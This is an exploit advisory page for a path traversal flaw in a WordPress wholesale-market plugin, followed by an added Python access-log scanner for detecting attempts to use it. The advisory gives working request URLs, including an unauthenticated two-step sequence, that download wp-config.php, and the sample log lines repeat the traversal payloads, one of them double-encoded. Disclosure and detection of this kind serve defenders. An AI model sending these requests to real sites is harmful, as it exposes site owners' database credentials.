## https://sploitus.com/exploit?id=WPEX-ID:B60A0D3D-148F-4E9B-BAEE-7332890804ED
v 1.0.6

If the wholesale_market_import_error folder does not exist, the issue is still exploitable by any authenticated user (same URLs as for v < 1.0.6).

If the folder already exists, the issue is exploitable by an unauthenticated user: https://example.com/wp-admin/admin-post.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin&section=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.php

v < 1.0.6 (as unauthenticated):

First call https://example.com/wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_read_csv, which will create the log directory.

Then call http://example.com/wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin&section=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.php to download wp-config.php.
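
Added example (not part of the original advisory or the plugin's code): a log check a defender could run to find requests to the download action above whose `ced_cwsm_log_download` value is anything other than a bare file name, including percent-encoded variants. The combined access-log format, the sample lines and the file name `import_errors.log` are assumptions constructed for the illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Identifiers taken from the requests shown on this page.
DOWNLOAD_ACTION = "ced_cwsm_csv_import_export_module_download_error_log"
PARAM = "ced_cwsm_log_download"
ENDPOINTS = ("/wp-admin/admin-post.php", "/wp-admin/admin-ajax.php")
# Assumption: Apache/nginx "combined" access-log format.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding, e.g. %252e -> %2e -> '.'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(filename):
    """True when the requested name is anything other than a bare file name."""
    name = fully_decode(filename).replace("\\", "/")
    return "/" in name or name == ".." or "\x00" in name

def scan(lines):
    """Return (client_ip, status, decoded_value) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(ENDPOINTS):
            continue
        query = parse_qs(url.query, keep_blank_values=True)
        if DOWNLOAD_ACTION not in query.get("action", []):
            continue
        hits += [(ip, int(status), fully_decode(v))
                 for v in query.get(PARAM, []) if is_traversal(v)]
    return hits

# Constructed sample lines (documentation IPs; "import_errors.log" is a made-up name).
_Q = "?action=" + DOWNLOAD_ACTION + "&" + PARAM + "="
SAMPLE_LOG = [
    f'203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin-post.php{_Q}../../../wp-config.php HTTP/1.1" 200 3120',
    f'203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-admin/admin-ajax.php{_Q}%252e%252e%252fwp-config.php HTTP/1.1" 200 3120',
    f'198.51.100.4 - - [01/Jan/2024:10:02:00 +0000] "GET /wp-admin/admin-post.php{_Q}import_errors.log HTTP/1.1" 200 512',
]
```

The check only sees parameters carried in the query string; requests that send `action` in a POST body need the same test applied at a WAF or in application logging.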